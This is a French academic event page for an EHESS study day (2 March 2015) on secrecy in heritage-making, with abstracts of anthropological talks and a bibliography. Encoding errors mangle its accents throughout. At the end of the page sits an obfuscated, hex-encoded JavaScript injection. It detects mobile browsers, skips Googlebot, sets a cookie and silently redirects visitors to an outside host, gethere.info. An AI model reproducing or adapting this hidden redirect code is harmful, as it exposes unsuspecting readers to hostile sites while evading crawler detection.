JOURNA�E D’A�TUDE FABRIQ’AM, Le secret, le 2 mars 2015, EHESS, Paris

JournA�e da��A�tude Fabriqa��am

PATRIMONIALISATION ET RA�GIMES Da��HISTORICITA� (II)A�

LE SECRET

Lundi 2 mars de 10 heures A� 18 heures,

A�cole des Hautes A�tudes en Sciences Sociales

A�bA?t Le France, 190 avenue de France, 75013 Paris

salle du conseil B

Nous avons au cours du projet Fabriqa��am explorA� diffA�rentes modalitA�s de A�A�mises en oubliA�A� suscitA�es par la patrimonialisationA�(la substitution de rituels, la��opposition, la��euphA�misation ou la��A�radication de la violence de certaines pratiques par exemple). Mais mettre en patrimoine suppose parfois aussi de taire volontairement pour diffA�rents motifs : la peur, la honte, la fiertA�, la colA?re, des formes de rA�sistance, la��affirmation da��un frontiA?re dans un monde qui se veut globalisA�, ou bien au contraire la volontA� de masquer des particularitA�s afin de pouvoir sa��y insA�rer et de pouvoir mener des revendications.

La��objectif de cette journA�e est de rA�flA�chir sur le A�A�secretA�A� dans un contexte de patrimonialisation et avec la volontA� de confA�rer une importance au contenu du secret et de ne pas rA�duire son analyse A� la��A�tude seule de sa forme (voir Adell 2014). DiffA�rents aspects seront abordA�sA�:

  • Les liens entre la��oubli et le secretA�: comment penser la��articulation ou les glissements entre le fait da��oublier et le secret dans les cas oA? la��idA�al de la patrimonialisation (idA�al communautaire, dA�mocratique, de justice, d’A�quilibre et de rA�ciprocitA�, d’harmonie avec la nature etc. selon) na��est pas compatible avec certaines pratiques indigA?nes (peines de mort, combats rituels violents, attaques sorcelaires par exemple)A�; comment penser cette articulation encore, dans les cas de violence politique (Voir Robin 2013) et notamment quand A�A�le devoir de mA�moireA�A� a donnA� lieu A� des processus de patrimonialisationA�?
  • Les conceptions et les rapports A� la temporalitA� et A� la��ancestralitA�, les modes de constructions mA�morielles A� travers la��A�tude des liens entre histoire orale et les archives notamment.
  • Voiler et dA�voiler : dA�voiler na��est pas que dire, tandis que cacher ne se rA�sume pas A� taire ; inversement taire na��est pas forcA�ment cacher et garder secret (voir (Adell op. cit., Armanet 2011). Il sa��agira de sa��interroger sur les rapports entre le contenu et la formeA�du secret ainsi que sur la transmission et le contrA?le de la diffusionA�da��information (contrA?ler cette diffusion au sein da��un processus de patrimonialisation est-ce garder un secretA�? Le secret peut-il supporter un dA�voilement graduelA�?). Mais au delA�, la��A�tude du secret interroge sur les frontiA?res qua��il estompe ou qua��il affirme entre des groupes et par lA� renvoie intimement A� des enjeux identitaires et politiques qua��il conviendra da��explorer dans sa dimension A� la fois synchronique et historique (Voir Demanget 2014).
  • Patrimoine, secretA�et trace : certaines pratiques (des rituels funA�raires, des techniques narratives) visent A� effacer des traces, A� faire disparaA�tre ou A� dissimuler et font en sorte qua��il na��y ait pas de transmission possible. Comment penser alors leur patrimonialisationA�? Peut-on patrimonialiser ce qui a disparu intentionnellementA�? Nous mettrons en parallA?le des cas oA? des pratiques fondA�es sur la��oubli et le secret na��ont jamais A�tA� patrimonialisA�es et da��autres fondA�es sur le contrA?le de la diffusion da��informations (certains codes culturels sont dA�voilA�s, da��autres non) afin de rA�flA�chir sur la��articulation entre secret, patrimoine et trace tout en considA�rant les diffA�rentes A�chelles de ce processus. Enfin, nous nous demanderons si inversement, la patrimonialisation ne peut pas A?tre vA�cue comme un dispositif qui a rA�vA�lA� des secretsA�?
  • Les A�motions : elles semblent jouer un rA?le cardinal dans les processus qui conduisent des groupes A� A�A�faire des secretsA�A�. Il sa��agira ici de mieux dA�terminer quelles peuvent A?tre ces A�motions, da��examiner leur rA?leA�(dans quelle mesure sont-elles des embrayeursA�de rA�flexivitA�A�? par exemple) et de sa��interroger sur la��articulation entre expression A�motionnelle, discours et pratiques.
  • La��anthropologue et le secretA�: quel est le rA?le de la��anthropologue et quelle prise de risque dans la��anthropologie et la��ethnographie du secret (Voir Graham M. Jones 2014) dans un contexte de patrimonialisationA�?A�Que fait la��anthropologue quand ses donnA�esA�sont censA�es rester secrA?tesA�? Ces interrogations conduisent A� nous interroger cette fois-ci sur les secrets de la��anthropologueA�et sur la��autocensure du chercheurA�: comment expliquer des processus politiques sans dA�voiler l’intimeA�? Comment concilier un certain engagement moral et politique, parfois militant, avec le travail scientifique par exemple ?

A�PROGRAMME

10hA�: accueil des participants

10h20

Laurence Charlier (anthropologue associA�e au MA)

PrA�sentation,

Lire le texte :A�PrA�sentation secret, L Charlier

10h30

Montserrat Ventura i Oller (Universitat AutA?noma de Barcelona)

La tradition A� la��envers : passA� et futur dans un exemple A�quatorien

Si la��oubliA� peut A?tre considA�rA� comme une faA�on de remA�morer autrement, dA?s qua��on essaye de comprendre la place de la��oubli dans les sociA�tA�s tournA�es vers la��avenir on peut concevoir le patrimoine, moins comme une cA�lA�bration da��un fait du passA�, que comme une mise A� la��avant de certains paradigmes que la sociA�tA� sa��efforce de sauvegarder. A�Ainsi, la sA�ance portera sur une catA�gorie da��A�vA�nements, tels que le silence, la discrA�tion, ou la��excA?s de parole en tant qua��A�lA�ments clA�s du devenir social, A� partir de la��ethnographie de la sociA�tA� Tsachila de la��A�quateur, afin de proposer un nouveau regard pour penser les actes de patrimonialisation.

11h15

Pause

11h30

Anath Ariel de Vidas (Directrice de Recherche, MA)

La��histoire omise. A�Tradition orale, histoire transcrite et patrimonialisation dans un village nahua au Mexique

La��exposA� explorera les rA�actions des habitants d’un village de culture nahua au Mexique au texte de la��anthropologue sur l’histoire de cette localitA� qui comprend des A�vA�nements historiques qui avaient A�tA� rA�duits au silence. Les A�changes autour de ce texte ont rA�vA�lA�, entre autres modes de relation A� la��histoire locale, aussi celui qui omet certains A�vA�nements historiques dont la mA�moire na��est plus transmise. L’analyse de la rA�ception de ce texte soulA?ve la question du type d’histoire que les habitants souhaitent adopter dans le processus de transcription de leur mA�moire collective ou, en d’autres termes, la question de la relation entre la tradition orale, le secret, la��oubli, la honte et les sources historiques explorA�es par la chercheuse. En mettant en perspective l’histoire omise avec celle qui est transmise, la��analyse de la��omission da��A�vA�nements historiques peut servir d’ouverture A�pistA�mologique afin de comprendre les notions locales du patrimoine, et par extension, une position collective sur les changements historiques.

A�12h15

Magali Demanget, (MaA�tresse de confA�rence, UniversitA� Paul-ValA�ry Montpellier)
Le trA�sor secret du chamanisme. Paradoxes de la mise en patrimoine dans la Sierra MazatA?que (Mexique)

Il sa��agira da��interroger la��attitude observA�e dans la sociA�tA� mazatA?que qui consiste simultanA�ment A� cacher et A� exhiber certains aspects du chamanisme local (acteurs mythiques locaux, usages rituels des champignons sacrA�s, oraisons/chants chamaniques). La��une des qualitA�s A�A�patrimonialesA�A� de ces aspects fut da��avoir A�tA� occultA�s dans le cours de la��Histoire et da��A?tre toujours au centre de pratiques tangibles. Cette qualitA� de secret garantit une continuitA� souterraine courant aussi bien dans la synchronie de relations sociales contemporaines que dans le fil da��un temps long (en lien avec la��hA�ritage prA�hispanique). En mA?me temps, dans cette perspective patrimoniale, la��existence du secret, du fait de sa mise en A�criture, est avant tout discursive. Ici, le secret constitue la plus value du patrimoine culturel local en A�tantA� rattachA� A� la��idA�e da��un bien prA�cieux, un trA�sor qui peut A?tre dA�robA�, un reste demeurA� cachA�, prA�servA� mais aussi sauvegardA�, au sens de gardA� vivant. La supposA�e continuitA� affichA�e sur les scA?nes patrimoniales paraA�tA� cependant, dans le cadreA� pragmatique des relations sociales, A�laborA�e A� partir de ruptures, de mA�salliances, de rapports da��inclusion/exclusion. Si je me suis attachA�e par ailleurs A� la��existence A�A�positiveA�A� du secret comme patrimoine, il sa��agira ici da��aborder la face cachA� de cette exhibition : qua��est-ce qui est soustrait A� la patrimonialisationA�? Les motifs de cette soustraction sont-ils conscientsA�? En quoi la valeur de ce qui est soustrait diffA?re-t-elle de ce qui est montrA�A�? Qui sont les acteurs, et surtout quelles sont les circonstances de ces pratiques de dissimulationA�? Ces interrogations nous conduiront A� explorer un A�A�contenuA�A� du secret indissociable de son existence pragmatique.

13h

DA�jeuner

A�14h

Vincent Hirtzel (ChargA� de recherche, LESC)

DiscrA�tion, camouflage et secret(s) : la politique de frontiA?re yurakarA�

En prenant la��exempleA� da��une parentA?leA� yurakarA� (piA�mont andin bolivien), cet exposA� examinera comment le secret peut A?tre analysA� comme la��extrA�mitA� da��un continuum de stratA�gies de rA�sistance A� travaillant A� la��interface du A� dehors A� et du A� dedans A�.A� Les difficultA�s et les surprises de la��enquA?te A�ethnographique menA�e en son sein (qui seront elle-mA?mes restituA�es dans leur A�paisseur historique) serviront A� A�baucher une rA�flexion sur les nA�cessaires transformations des rapports frontaliers auxquels peuvent conduire les processus de patrimonialisation. Dans quelle mesure la��effort patrimonial repose-t-il sur un monde utopique de A� libre-circulation A�, sans frontiA?re A� A�paisse A� ? Dans quelle mesure est-il tributaire, par ailleurs, sur le registre politique, de la dilution A� acceptable A� de la��altA�ritA� ?

Lire le texte en PdfA�Hirtzel V. DiscrA�tion, camouflage et secret

14h45

Laurence Charlier (Anthropologue associA�e au MA) et Claude Legouill (sociologue associA� au CREDAL)

Des secrets des ayllus aux secrets de la��anthropologueA�: une approche croisA�e du secret en contexte de patrimonialisation dans le Nord Potosi de Bolivie

Nous allons nous attacher A� croiser les donnA�es, les mA�thodes mais aussi les questionnements rA�flexifs que nous avons pu avoir chacun sur un mA?me terrain (le Nord Potosi) vis A� vis du secret en contexte de patrimonialisation. Cette prA�sentation est le fruit da��une rencontre entre deux chercheurs aux mA�thodes et aux recherches diffA�rentes mais qui ont pu aboutir A� une rA�flexion commune sur la patrimonialisation des ayllus dA?s lors prA�cisA�ment que nous abordions la question du secret. La patrimonialisation des ayllus renvoie en effet A� un idA�al communautaire, dA�mocratique, d’A�quilibre et de rA�ciprocitA�. Cet idA�al a incitA� les ayllus A� taire certaines pratiques qui ne coA?ncidaient guA?re avec cet idA�al et qui, une fois sorties du groupe, risquaient de leur supprimer des avantages symboliques acquis par la figure de l’A�A�indio permitidoA�A� (Hale, 2004), et leur permettant d’obtenir des reconsidA�rations A�conomiques, politiques et territoriales.A�Deux points seront examinA�sA�: les secrets rA�vA�lA�s par la�?anthropologue aux ayllus et les secrets rA�vA�lA�s A� la��anthropologue par des membres de la��ayllu. Nous ferons tout da��abord rA�fA�rence A� la��accA?s du chercheur aux sources et aux archives du Nord Potosi ignorA�es au dA�but de notre terrain par les habitants des ayllus, mais qui peuvent jouer aussi bien un rA?le dans leur A�A�processus de reconstitution des ayllusA�A� que dans la rA�solution de leurs conflits locaux en se heurtant A� la mA�moire orale. Le mythe les auraient-ils trompA�s comme l’expliquent les habitants de la��ayllu KharachaA�arguant qua��on leur avait cachA� la vA�ritA� ? S’agit-il de dA�voiler les secrets des archivesA� et de rA�vA�ler les erreurs de la reconstitution historique des ayllusA�? La��autre point sera consacrA� A� la��anthropologue qui dA�range dA?s lors que des secrets lui ont A�tA� rA�vA�lA�s, souvent de maniA?re imprA�vue (confidences intimes, rA�vA�lations sous la��effet de la��alcool) ou lors de conflits in situA�: peine de mort pour cause de vol, absence de sanction pour des cas da��infanticide ou de viol, attaques sorcelaire, pratiques de guerre par exemple. Ceci nous conduira en conclusion A� rA�flA�chir sur le rA?le de la��anthropologue par rapport aux secretsA�: que fait-il des donnA�es censA�es ne pas A?tre dA�voilA�esA�? Comme rendre compte A� l’A�crit de certaines pratiquesA�? Au delA�, ces questions nous renvoient aussi aux secrets de la��anthropologueA�: quels sont les secrets de la��anthropologue vis A� vis de ses interlocuteurs sur le terrain mais aussi vis A� vis de la communautA� scientifiqueA�? Quelle est la place de la��autocensureA�?

15h30

Pause

15h45

Ariela Epstein (post-doctorante LISST)

A�A�On-ditA�A� et rA�ponses A�vasives, la non-A�criture da��un morceau da��histoire en contexte de patrimonialisation

Comme toute construction patrimoniale, celle de la��ancienne usine Anglo (Fray Bentos, Uruguay) et du quartier ouvrier qui la��entoure, implique une A�criture du passA�. Le processus institutionnel A� la��A�uvre a posA� des balises dans le tempsA�: la mA�moire mise en avant est celle de la��usine en marche, et celle de la vie ouvriA?re, jusqua��A� la fermeture de la��A�tablissement. La��ethnographie du prA�sent de ce quartier oblige pourtant A� interroger un autre moment historique, celui de la dictature militaire, qui correspond, juste aprA?s la fermeture de la��usine, A� la��expulsion de presque tous les habitants du quartier Anglo. Mon travail interroge alors ce passA� qui en A�A�rA�veilleA�A� un autre, et tente de saisir les enjeux actuels des diffA�rentes mA�moires de ce lieu.

16h30

Nathalie Manrique (Anthropologue affiliA�e au LAS)

Secrets, simulacres et exhibitions. Noces et pratiques funA�raires chez les Gitans da��Andalousie

Chez les Gitans da��Espagne, deux champs de pratiques sont tenus pour secretsA�: ceux liA�s au mariage et ceux associA�s A� la mort. Seuls des Gitans sont, en principe, autorisA�s A� connaA�tre les dA�tails de la dA�floration de la mariA�e, A� poser leur regard sur les A�A�trois rosesA�A� et A� se laisser envelopper par la mA�lodie de la��AlboreA? (ou Yeli) considA�rA�e comme A�tant le patrimoine essentiel des Gitans (dA�clarA�e Patrimoine ImmatA�riel de la��HumanitA� par la��Unesco en 2010). Le secret semble ainsi perpA�tuer fondamentalement la frontiA?re entre les Gitans et les non-Gitans. Da��autre part, A� la mort da��un Gitan, la��existence de cet individu est officiellement oubliA�e pour et par tous. Plusieurs techniques da��oubli sont donc instaurA�es dont la mise en place du secret. Ce dernier sa��adresse essentiellement aux proches parents du dA�funt qui doivent sa��assurer que le surnom de leur cher disparu ne soit plus prononcA�. Dans ces deux champs, le secret semble donc A�uvrer de maniA?re distincteA�: da��un cA?tA�, le silence serait imposA� pour marquer et perpA�tuer la frontiA?re entre A�A�ceux qui saventA�A� (les Gitans) et A�A�ceux qui ne savent pasA�A� (les non-Gitans) et de la��autre, pour dissimuler un contenu pourtant connu de tous pour qua��il sombre ainsi dans la��oubli.

La��A�tude de simulacres de mariages devenus des patrimoines touristiques A� la��A�chelle internationale (Procession des Gitans lors de la Semaine Sainte de Grenade et pA?lerinage de la Vierge de Cabra A� Cordoue), montre que le rA?le de ces secrets est moins la construction da��une frontiA?re entre initiA�s et non-initiA�s que la��occasion de rA�vA�ler A� chaque Gitan, par la��intermA�diaire de diffA�rents codes, les statuts, trA?s mobiles, de chacun au sein de la communautA�. Ces codes se transmettent da��une gA�nA�ration A� la��autre perpA�tuant, de maniA?re parallA?le, la distinction entre Gitans et non-Gitans. Lors da��un dA�cA?s, le secret permet da��exclure le dA�funt de tout type de transmission (matA�rielle ou symbolique) aux gA�nA�rations qui suivent. Les secrets gitans agissent A� la fois pour la transmission et pour la��exclusion de celle-ci. Ils rA�vA?lent donc la��importance de la��A�A�A�intimitA� culturelleA�A�, celle qua��on se rA�serve pour la��entre soi, pour le bon fonctionnement interne du groupe et reflA?tent une identitA� fondA�e sur la seule transmission communautaire et jamais individuelle.

17h15

DA�bat

Discutant

Emmanuel de Vienne (MaA�tre de confA�rence, Nanterre UniversitA�)

Organisation

Laurence Charlier

laurencecharlierzein@gmail.com

Bibliographie

Adell, N., 2014, Introduction. Faire le secret, Mondes contemporains, NA�5, p. 3-10.

Armanet, E., 2011, Le ferment et la grA?ce. Une ethnographie du sacrA� chez les Druzes d’IsraA�l, Toulouse, Presses Universitaires du Mirail.

Demanget, M., 2014, La patrimonialisation de la��occulte. Secret chamanique et A�criture en terres mazatA?ques (Mexique), Mondes contemporains, NA�5, p. 29-51.

Graham M. Jones, 2014, Secrecy, Annual Review of Anthropology, Vol. 43 : 53-69 (Volume publication date October 2014), First published online as a Review in Advance on June 24, , DOI: 10.1146/annurev-anthro-102313-030058.

Hale C., 2004, Rethinking indigenous politics in the era of the A�A�indio permitidoA�A�, National American Congress on Latin America (NACLA), Report on the Americas, 38, 2, New York, p. 16-21.

Hale C. and Millaman R., 2005, Forthcoming Cultural Agency and Political Struggle in the Era of Indio Permitido, Cultural Agency in the Americas, edited by Doris Sommer. Durham, NC: Duke University Press. p. 281-301.

Harrison R., 2013, Forgetting to remember, remembering to forget: late modern heritage practices, sustainability and the a�?crisisa�� of accumulation of the past

International Journal of Heritage Studies,
Vol. 19, No. 6, 579a��595, http://dx.doi.org/10.1080/13527258.2012.678371

Robin V., 2013,A�(Re)jouer la��histoire de la guerre, revivre le massacre. Performance carnavalesque et processus mA�moriels dans les Andes da��Ayacucho (PA�rou), Droit et cultures, 66, p. 103-124,A�http://droitcultures.revues.org/3174

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}